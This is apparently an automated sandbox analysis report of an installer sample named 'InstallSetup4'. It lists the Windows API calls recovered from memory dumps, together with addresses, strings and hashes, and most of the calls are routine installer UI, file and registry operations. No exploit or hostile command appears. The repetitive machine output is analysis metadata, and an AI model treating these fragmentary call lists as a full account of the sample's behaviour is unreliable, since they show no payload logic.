                                                                                            • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                            • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                            • GetSysColor.USER32(00000000), ref: 00404598
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                            • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                            • GetSysColor.USER32(?), ref: 004045C3
                                                                                            • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                            • DeleteObject.GDI32(?), ref: 004045ED
                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                            • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                            • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                              • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                            • String ID: 9
                                                                                            • API String ID: 163830602-2366072709
                                                                                            • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                            • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                            • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                            • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                            • lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                            • lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                            • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2531174081-0
                                                                                            • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                            • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                            • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                            • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                            • CharNextW.USER32(?,0043F000,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                            • CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-3250253040
                                                                                            • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                            • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                            • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                            • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                                                            • GetMessagePos.USER32 ref: 00404EB4
                                                                                            • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                            • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                            • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                            • MulDiv.KERNEL32(002065CE,00000064,002065D2), ref: 00402FE1
                                                                                            • wsprintfW.USER32 ref: 00402FF1
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402FEB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                            • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                            • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                            • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2667972263-0
                                                                                            • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                            • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                            • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                            • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                            APIs
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                            Similarity
                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                            • String ID:
                                                                                            • API String ID: 1354259210-0
                                                                                            • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                            • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                                                            • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                            • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                            • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                            • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                            • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                            • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401E56
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                            • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3808545654-0
                                                                                            • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                            • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                            • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                            • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                            • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                            • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                            • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                            • wsprintfW.USER32 ref: 00404E2D
                                                                                            • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                            • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                            • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                            • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                            • CharNextW.USER32(00000000), ref: 00405EE4
                                                                                            • CharNextW.USER32(00000000), ref: 00405EFC
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext
                                                                                            • String ID: C:\
                                                                                            • API String ID: 3213498283-3404278061
                                                                                            • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                            • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                                                                            • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                            • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E48
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-297319885
                                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                            • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                            • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                            APIs
                                                                                            • GlobalFree.KERNEL32(006A5820), ref: 00401C10
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C22
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree
                                                                                            • String ID: Xj$Installed
                                                                                            • API String ID: 3394109436-1323946118
                                                                                            • Opcode ID: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                                                            • Instruction ID: 52bd34c5afe528d1e7f7705a0b64ffdd7bdb14472fd10e075fda9825736fe234
                                                                                            • Opcode Fuzzy Hash: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                                                            • Instruction Fuzzy Hash: B221F972900254E7D720BF98DD89E5E73B5AB04718711093FF552B76C0D7B8AC019B9D
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                            • GetTickCount.KERNEL32 ref: 0040304F
                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                            • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                            • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                            • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                              • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                            • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                            • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                            • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,76F93420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
